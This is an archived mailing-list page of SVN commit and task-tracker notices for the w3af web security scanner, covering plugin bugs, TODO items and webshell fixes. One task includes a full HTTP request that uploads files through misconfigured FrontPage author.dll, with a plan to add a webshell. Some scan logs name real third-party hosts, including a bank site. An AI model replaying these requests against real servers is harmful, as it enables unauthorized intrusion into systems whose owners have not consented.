w3af-svn-notify Mailing List for w3af (Page 276)
Status: Beta
Brought to you by:
andresriancho
Menu
▾
▴
w3af-svn-notify — This mailing list has a copy of the SVN Commit logs and each modified file
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
(235) |
Mar
(336) |
Apr
(280) |
May
(278) |
Jun
(159) |
Jul
(270) |
Aug
(240) |
Sep
(121) |
Oct
(110) |
Nov
(199) |
Dec
(228) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(251) |
Feb
(206) |
Mar
(115) |
Apr
(45) |
May
(27) |
Jun
(67) |
Jul
(49) |
Aug
(38) |
Sep
(10) |
Oct
(131) |
Nov
(89) |
Dec
(38) |
| 2010 |
Jan
(85) |
Feb
(71) |
Mar
(45) |
Apr
(23) |
May
(12) |
Jun
|
Jul
(11) |
Aug
(7) |
Sep
(81) |
Oct
(79) |
Nov
(165) |
Dec
(62) |
| 2011 |
Jan
(134) |
Feb
(73) |
Mar
(34) |
Apr
(63) |
May
(147) |
Jun
(43) |
Jul
(21) |
Aug
(26) |
Sep
(43) |
Oct
(34) |
Nov
(44) |
Dec
(112) |
| 2012 |
Jan
(47) |
Feb
(44) |
Mar
(72) |
Apr
(209) |
May
(54) |
Jun
(279) |
Jul
(151) |
Aug
(332) |
Sep
(39) |
Oct
(268) |
Nov
(116) |
Dec
(368) |
| 2013 |
Jan
(73) |
Feb
|
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: SourceForge.net <no...@so...> - 2008-02-24 23:56:52
|
Task #141516 has been updated. Project: w3af Subproject: TODO v1.20 Summary: javascript analysis Complete: 0% Status: Deleted Authority : andresriancho Assigned to: nobody Description: do some javascript analysis with what I will learn at fi.uba.ar . Follow-Ups: ------------------------------------------------------- Date: 2008-02-24 20:56 By: andresriancho Comment: Static code analysis of js is impossible. ------------------------------------------------------- Date: 2007-09-24 17:01 By: andresriancho Comment: http://uninformed.org/index.cgi?v=8&a=1 ------------------------------------------------------- Date: 2007-08-30 16:05 By: andresriancho Comment: Useful link: http://wiki.python.org/moin/LanguageParsing Other links: http://pages.cpsc.ucalgary.ca/~aycock/spark/ http://christophe.delord.free.fr/tpg/index.html http://www.antlr.org/ ------------------------------------------------------- Date: 2007-08-30 14:00 By: andresriancho Comment: http://www.google.com/codesearch?hl=en&q=+lang:python+%22javascript%22+%2Bcompiler+show:qX0z_o_C3co:GCvBt74PMzE:AE8Cw74sLK8&sa=N&cd=2&ct=rc&cs_p=http://downloads.activestate.com/Komodo/Linux/4.0/Komodo-Edit-4.0.2-275451-linux-libcpp5-x86.tar.gz&cs_f=Komodo-Edit-4.0.2-275451-linux-libcpp5-x86/INSTALLDIR/lib/mozilla/python/komodo/codeintel2/lang_javascript.py#a0 what is ECMAScript ? ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=141516&group_id=170274&group_project_id=50713 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 23:56:13
|
Task #144186 has been updated. Project: w3af Subproject: TODO v1.20 Summary: gui Complete: 0% Status: Deleted Authority : andresriancho Assigned to: nobody Description: http://www.async.com.br/projects/kiwi/learnmore.html Follow-Ups: ------------------------------------------------------- Date: 2008-02-24 20:56 By: andresriancho Comment: Already have a pyGTK gui task list. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=144186&group_id=170274&group_project_id=50713 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:50:12
|
Task #136479 has been updated. Project: w3af Subproject: Plugin TODO v1.40 Summary: diff _equal() for sqlmap wrapper Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: implement diff _equal() for sqlmap wrapper depending on user options. This could be implmenting by returning a class in getPage, and touching the __eq__ method of that class. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=136479&group_id=170274&group_project_id=55344 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:49:58
|
Task #136480 has been updated. Project: w3af Subproject: Plugin TODO v1.40 Summary: add the third _equal() method to blind sql detection Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: add the third _equal() method to blind sql detection; intelligentCut. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=136480&group_id=170274&group_project_id=55344 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:49:35
|
Task #136478 has been updated. Project: w3af Subproject: Plugin TODO v1.40 Summary: threaded getValues() in sqlmap Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: threaded getValues() in sqlmap ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=136478&group_id=170274&group_project_id=55344 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:48:43
|
Task #145907 has been updated. Project: w3af Subproject: Plugin TODO v1.40 Summary: proxy detection with VPN/TOR Complete: 0% Status: Deleted Authority : andresriancho Assigned to: nobody Description: > > I was thinking of a few other methods to look for these. My first > > thought would be to try using Tor or other VPN overlay (one that isn't > > a _web_ proxy would be good...) to see if the results are different > > than without using the overlay. > > Well, that would add many dependencies to w3af. I would think about adding a > dependency like that if it was a MUST HAVE feature, but proxy detection is > not sooooo important compared with javascript analysis. It would be nice as a configurable feature though... I'll put some more thought into that at a later time. Follow-Ups: ------------------------------------------------------- Date: 2008-02-24 16:48 By: andresriancho Comment: Effort to perform this task: 10/10 Gain: 0.00001/10 Deleted. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145907&group_id=170274&group_project_id=55344 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:46:46
|
Task #144518 has been updated. Project: w3af Subproject: Plugin TODO v1.10 Summary: localFileReader / pathDisclosure bug Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: Even with this information: - /home/dz0/w3af/extras/testEnv/webroot/localFileInclusion/vulnerable.php . Found in request id's: [7] I get this result: w3af/exploit/localFileReader>>> list Not enough path disclosure information was collected to return meaningful information. w3af/exploit/localFileReader>>> exitPlugin The test script is: ./w3af -s scripts/script-localFileInclude+pathDisc.w3af ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=144518&group_id=170274&group_project_id=55629 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:46:31
|
Task #145075 has been updated.
Project: w3af
Subproject: Plugin TODO v1.10
Summary: audit.sslCertificate ; get more info
Complete: 0%
Status: Open
Authority : andresriancho
Assigned to: nobody
Description: Get more info from the certificate and validate dates, domain name, etc.
Follow-Ups:
-------------------------------------------------------
Date: 2008-01-11 12:19
By: andresriancho
Comment:
Something like this should be shown:
Server certificate
-----BEGIN CERTIFICATE-----
MIIC0zCCAjwCCQCtz8J102gJFzANBgkqhkiG9w0BAQUFADCBrTELMAkGA1UEBhMC
R0IxEzARBgNVBAgTClNvbWUtU3RhdGUxFjAUBgNVBAcTDVNvbWUtTG9jYWxpdHkx
GTAXBgNVBAoTEE9uZSBPcmdhbml6YXRpb24xHjAcBgNVBAsTFU9uZSBPcmdhbml6
YXRpb24gVW5pdDESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
ZWJtYXN0ZXJAbG9jYWxob3N0MB4XDTA2MTIxMTE2MDQyOVoXDTA3MDExMDE2MDQy
OVowga0xCzAJBgNVBAYTAkdCMRMwEQYDVQQIEwpTb21lLVN0YXRlMRYwFAYDVQQH
Ew1Tb21lLUxvY2FsaXR5MRkwFwYDVQQKExBPbmUgT3JnYW5pemF0aW9uMR4wHAYD
VQQLExVPbmUgT3JnYW5pemF0aW9uIFVuaXQxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDCBnzANBgkqhkiG9w0B
AQEFAAOBjQAwgYkCgYEA72qyH0+6Bqpx4FHfEkezqPHZuE212r8nDm8//udvYPoX
yiswL7H3zb7M7ZftvcTKGwisSdcg6A+IoqO6zyvjorg9dAkFZ0B8RjeEavqB/BYG
oax0Ql6E9TRK9jzvz28cbz3fFi20Njuau8O6OGCxNgEqJDvLFDBVj539lOR2jtEC
AwEAATANBgkqhkiG9w0BAQUFAAOBgQA1qEjGcY+9jVz635zzvLevo+S7sLROPvIp
uQUPHQPfQ2xx3BEb5slSRlgUARV4/cE0OEODPOL/8xvJeTyTLBilXw4pUBeOm9tz
rCsJ1ljpCNf4I2/Ecm6uK446sYIv2E0946KiMz//3esRGi5iSiNr/Aw66VOg1wbx
xMyx7wAbeg==
-----END CERTIFICATE-----
subject=/C=GB/ST=Some-State/L=Some-Locality/O=One Organization/OU=One Organization Unit/CN=localhost/emailAddress=webmaster@localhost
issuer=/C=GB/ST=Some-State/L=Some-Locality/O=One Organization/OU=One Organization Unit/CN=localhost/emailAddress=webmaster@localhost
---
No client certificate CA names sent
---
Ciphers common between both SSL endpoints:
RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5
EXP-RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5
---
SSL handshake has read 860 bytes and written 236 bytes
---
New, SSLv2, Cipher is DES-CBC3-MD5
Server public key is 1024 bit
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : SSLv2
Cipher : DES-CBC3-MD5
Session-ID: 63D445918D33F99FF8B4C241427DCE04
Session-ID-ctx:
Master-Key: FEE6B631E93F3768DA1ADD5F29A0E2081F8E79B0B4668AA9
Key-Arg : 48B59B5390412D47
Start Time: 1200064709
Timeout : 300 (sec)
Verify return code: 10 (certificate has expired)
---
-------------------------------------------------------
Date: 2008-01-11 11:41
By: andresriancho
Comment:
This can be done with the openssl module! The plugin that should be modified is audit.sslCertificate.
Also, only perfom *one* connection to the remote server, not one for every call. Show the gathered information only one time.
Finally, check that the certificate is valid. Maybe openssl can do this ?!
-------------------------------------------------------
For more info, visit:
http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145075&group_id=170274&group_project_id=55629
|
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:45:48
|
Task #145387 has been updated. Project: w3af Subproject: Plugin TODO v1.10 Summary: post requests and spiderMan Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: Do a different handling of post requests and fuzzable requests object generation. Found 7 URLs and 3 different points of injection. The list of fuzzable requests is: - http://200.32.71.75/cash/validaAdministrador.jsp | Method: POST | Parameters: (login,password) - http://200.32.71.75/cash/validaAdministrador.jsp | Method: POST | Parameters: (login,password) - http://200.32.71.75/cash/validaAdministrador.jsp | Method: POST | Parameters: (login,password) ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145387&group_id=170274&group_project_id=55629 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:45:13
|
Task #145064 has been updated. Project: w3af Subproject: Plugin TODO v1.10 Summary: check if remote webserver is an open proxy Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: Create a discovery plugin that will try to use the CONNECT and the GET method in such a way that we can be sure if the remote web server is configured as an open proxy. http://packetstormsecurity.org/filedesc/proxycheck.pl.txt.html Follow-Ups: ------------------------------------------------------- Date: 2008-02-19 14:11 By: andresriancho Comment: This is trivial if I don't use xUrllib, the problem is that I need to send this request: CONNECT www.google.com:80 HTTP/1.0 Which doesnt look like the classic GET /abc/1.php HTTP/1.0 The method thing is covered, the problem is the missing '/' and the : . ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145064&group_id=170274&group_project_id=55629 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:43:14
|
Task #145813 has been updated. Project: w3af Subproject: Plugin TODO v1.00 Summary: frontpage extensions Complete: 50% Status: Open Authority : andresriancho Assigned to: nobody Description: Create a plugin that exploits misconfigured frontpage extensions: Upload a file: POST /_vti_bin/_vti_aut/author.dll - 200 Test if it was created: GET /i.htm - 200 Follow-Ups: ------------------------------------------------------- Date: 2008-02-24 16:43 By: andresriancho Comment: Asked for help on the users mailing list, awaiting response. ------------------------------------------------------- Date: 2008-01-30 16:41 By: andresriancho Comment: Coded the audit plugin, now I need an attack plugin that can exploit this vuln by uploading a webshell. ------------------------------------------------------- Date: 2008-01-30 15:42 By: andresriancho Comment: REQUEST ======= POST http://XXXX/_vti_bin/_vti_aut/author.dll HTTP/1.0 Host: XXXX User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;) Pragma: no-cache Content-Type: application/x-www-form-urlencoded method=put document:4.0.2.4715&service_name=&document=[document_name=index-3.htm;meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false RESPONSE ======== HTTP/1.0 200 OK Date: Wed, 30 Jan 2008 18:37:11 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET X-FrontPage-User-Name: IUSR_ECUIO012EP12 <html><head><title>vermeer RPC packet</title></head> <body> <p>method=put document:4.0.2.4715 <p>message=successfully put document 'index-3.htm' as 'c:\inetpub\wwwroot\index-3.htm' <p>document= <ul> <li>document_name=index-3.htm <li>meta_info= <ul> <li>vti_author <li>SR|IUSR_ECUIO012EP12 <li>vti_modifiedby <li>SR|IUSR_ECUIO012EP12 <li>vti_timecreated <li>TR|30 Jan 2008 18:37:12 -0000 <li>vti_timelastmodified <li>TR|30 Jan 2008 18:37:12 -0000 <li>vti_filesize <li>IR|0 <li>vti_backlinkinfo <li>VX| <li>vti_timelastwritten <li>TX|30 Jan 2008 18:37:12 -0000 </ul> </ul> </body> </html> ------------------------------------------------------- Date: 2008-01-30 15:24 By: andresriancho Comment: http://msdn2.microsoft.com/en-us/library/ms479623.aspx ------------------------------------------------------- Date: 2008-01-30 15:18 By: andresriancho Comment: http://www.packetstormsecurity.org/9910-exploits/webfolders.txt ------------------------------------------------------- Date: 2008-01-30 14:59 By: andresriancho Comment: The content posted to author.dll method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dindex.htm%3bmeta%5finfo%3d%5b%5d%5d&put%5foption=overwrite&comment=&keep%5fchecked%5fout=false ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145813&group_id=170274&group_project_id=50603 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:02:45
|
Task #145282 has been updated. Project: w3af Subproject: TODO v1.10 Summary: progress bar "breaks" output Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: Starting preg_replace plugin execution. 100% [====================================================] 127/127 Starting LDAPi plugin execution. 5% [==> ] 6/127 ETA 00:25The resource: http://www.bancohipotecario.com.ar/default.asp has a user and password in the body . The vulnerability was found in the request with id 4776. The resource: http://www.bancohipotecario.com.ar/default.asp has a user and password in the body . The vulnerability was found in the request with id 4776. The resource: http://www.bancohipotecario.com.ar/default.asp has a user and password in the body . The vulnerability was found in the request with id 4776. The resource: http://www.bancohipotecario.com.ar/default.asp has a user and password in the body . The vulnerability was found in the request with id 4776. 100% [====================================================] 127/127 Starting phishingVector plugin execution. 100% [====================================================] 127/127 Starting responseSplitting plugin execution. 100% [====================================================] 127/127 Starting localFileInclude plugin execution. 48% [========================> ] 61/127 ETA 02:51Too many retries when trying to get: http://www.bancohipotecario.com.ar/cotizaciones.aspx 99% [==================================================> ] 126/127 ETA 00:02Starting ssi plugin execution. 100% [====================================================] 127/127 Starting remoteFileInclude plugin execution. remoteFileInclude plugin has to be correctly configured to use. 99% [==================================================> ] 126/127 ETA 00:00Starting sslCertificate plugin execution. 100% [====================================================] 127/127 Starting unSSL plugin execution. 100% [====================================================] 127/127 Starting buffOverflow plugin execution. 24% [===========> ] 30/127 ETA 03:15 ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145282&group_id=170274&group_project_id=54341 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 17:29:19
|
Task #142885 has been updated. Project: w3af Subproject: Plugin TODO v1.00 Summary: remote file include shell only works with php Complete: 0% Status: Closed Authority : andresriancho Assigned to: andresriancho Description: remote file include shell only works with php Follow-Ups: ------------------------------------------------------- Date: 2008-02-24 14:29 By: andresriancho Comment: Fixed in revision 719. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=142885&group_id=170274&group_project_id=50603 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 17:28:41
|
Task #144671 has been updated. Project: w3af Subproject: TODO v1.00 Summary: remote file include shell is broken Complete: 0% Status: Closed Authority : andresriancho Assigned to: andresriancho Description: remote file include shell is broken Follow-Ups: ------------------------------------------------------- Date: 2008-02-24 14:28 By: andresriancho Comment: Fixed in revision 719. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=144671&group_id=170274&group_project_id=48542 |
|
From: <and...@us...> - 2008-02-24 17:28:34
|
Revision: 719
http://w3af.svn.sourceforge.net/w3af/?rev=719&view=rev
Author: andresriancho
Date: 2008-02-24 09:28:16 -0800 (Sun, 24 Feb 2008)
Log Message:
-----------
Fixed bug in remote file include shell; now it can exploit that vulnerability in any type of programming language (PHP is the only one that is "affected by default" but others may be affected because of programming errors.)
Modified Paths:
--------------
trunk/plugins/attack/remoteFileIncludeShell.py
trunk/plugins/attack/webshells/cmd.asp
trunk/plugins/attack/webshells/cmd.jsp
trunk/plugins/attack/webshells/cmd.php
trunk/plugins/attack/webshells/cmd.py
trunk/scripts/script-remoteFileInclude.w3af
trunk/w3af.e3p
trunk/w3af.e3t
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-02-24 13:59:46
|
Revision: 718
http://w3af.svn.sourceforge.net/w3af/?rev=718&view=rev
Author: andresriancho
Date: 2008-02-24 05:59:35 -0800 (Sun, 24 Feb 2008)
Log Message:
-----------
Fixed a small bug in a usage message. Thanks to Ulises Cu?\195?\177e.
Modified Paths:
--------------
trunk/tools/base64encode
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: SourceForge.net <no...@so...> - 2008-02-24 13:32:23
|
Task #137884 has been updated. Project: w3af Subproject: Plugin TODO v1.10 Summary: Verify that all fastExploit methods are working Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: Verify that all fastExploit methods are working ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=137884&group_id=170274&group_project_id=55629 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 13:31:44
|
Task #146508 has been updated. Project: w3af Subproject: Plugin TODO v1.10 Summary: newline reporting findings in a nasty way Complete: 0% Status: Open Authority : andresriancho Assigned to: andresriancho Description: The body of the URL: http://localhost/../config.dat was created using a unix editor. This information was found in the request with id 1559. The body of the URL: http://localhost/../webserver.ini was created using a unix editor. This information was found in the request with id 1561. The body of the URL: http://localhost/./ was created using a unix editor. This information was found in the request with id 1582. The body of the URL: http://localhost/.htaccess was created using a unix editor. This information was found in the request with id 1600. The body of the URL: http://localhost/.htpasswd was created using a unix editor. This information was found in the request with id 1602. The body of the URL: http://localhost// was created using a unix editor. This information was found in the request with id 387. The body of the URL: http://localhost////./../.../boot.ini was created using a unix editor. This information was found in the request with id 1641. The body of the URL: http://localhost/a was created using a unix editor. This information was found in the request with id 1702. The body of the URL: http://localhost/cgi-bin/ was created using a unix editor. This information was found in the request with id 630. The body of the URL: http://localhost/cgi-bin/.htaccess was created using a unix editor. This information was found in the request with id 372. The body of the URL: http://localhost/cgi-bin/.htaccess.old was created using a unix editor. This information was found in the request with id 616. The body of the URL: http://localhost/cgi-bin/.htaccess.save was created using a unix editor. This information was found in the request with id 618. The body of the URL: http://localhost/cgi-bin/.htaccess~ was created using a unix editor. This information was found in the request with id 622. The body of the URL: http://localhost/cgi-bin/.htpasswd was created using a unix editor. This information was found in the request with id 624. The body of the URL: http://localhost/cgi-bin//htsearch was created using a unix editor. This information was found in the request with id 631. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146508&group_id=170274&group_project_id=55629 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 13:31:30
|
Task #145782 has been updated. Project: w3af Subproject: Plugin TODO v1.00 Summary: sqlmap inherits from consoleMenu :S Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: sqlmap inherits from consoleMenu :S this sucks and can't be used in gtkUi. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145782&group_id=170274&group_project_id=50603 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 13:30:56
|
Task #138342 has been updated. Project: w3af Subproject: Plugin TODO v1.10 Summary: Google proxy Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: http://www.google.com/gwt/n?u=http%3A%2F%2Fwww.joomla.org Follow-Ups: ------------------------------------------------------- Date: 2007-04-19 16:36 By: andresriancho Comment: the GET part is ok, now I have to see how the forms are handled. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=138342&group_id=170274&group_project_id=55629 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 13:30:44
|
Task #146453 has been updated. Project: w3af Subproject: Plugin TODO v1.10 Summary: detectWAF - Identify mod_security Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: detectWAF - Identify mod_security by using different types of requests of different versions of mod_security. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146453&group_id=170274&group_project_id=55629 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 13:30:22
|
Task #142141 has been updated. Project: w3af Subproject: Plugin TODO v1.10 Summary: raw vdaemon as attack plugin Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: raw vdaemon as attack plugin ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=142141&group_id=170274&group_project_id=55629 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 13:26:56
|
Task #143694 has been updated. Project: w3af Subproject: Javascript support Summary: javascript - handle timeouts Complete: 0% Status: Open Authority : andresriancho Assigned to: nobody Description: if the javascript enters an infinite loop, i should be able to detect that and take some action. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=143694&group_id=170274&group_project_id=55588 |
|
From: SourceForge.net <no...@so...> - 2008-02-24 13:26:18
|
Task #145083 has been updated. Project: w3af Subproject: TODO v1.10 Summary: scan profiles - ini file Complete: 75% Status: Open Authority : andresriancho Assigned to: nobody Description: scan profiles, "fast scan", "complete scan", etc. Follow-Ups: ------------------------------------------------------- Date: 2008-02-08 22:29 By: andresriancho Comment: Must save cfg options in ini file!! ------------------------------------------------------- Date: 2007-12-31 14:47 By: andresriancho Comment: I need to do more scan profiles, but the code that handles all of it is finished. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145083&group_id=170274&group_project_id=54341 |
|
From: <and...@us...> - 2008-02-24 12:29:10
|
Revision: 717
http://w3af.svn.sourceforge.net/w3af/?rev=717&view=rev
Author: andresriancho
Date: 2008-02-24 04:28:36 -0800 (Sun, 24 Feb 2008)
Log Message:
-----------
Fixed a bug in the assert command of the consoleUi.
Modified Paths:
--------------
branches/sasha/core/ui/consoleUi/menu.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
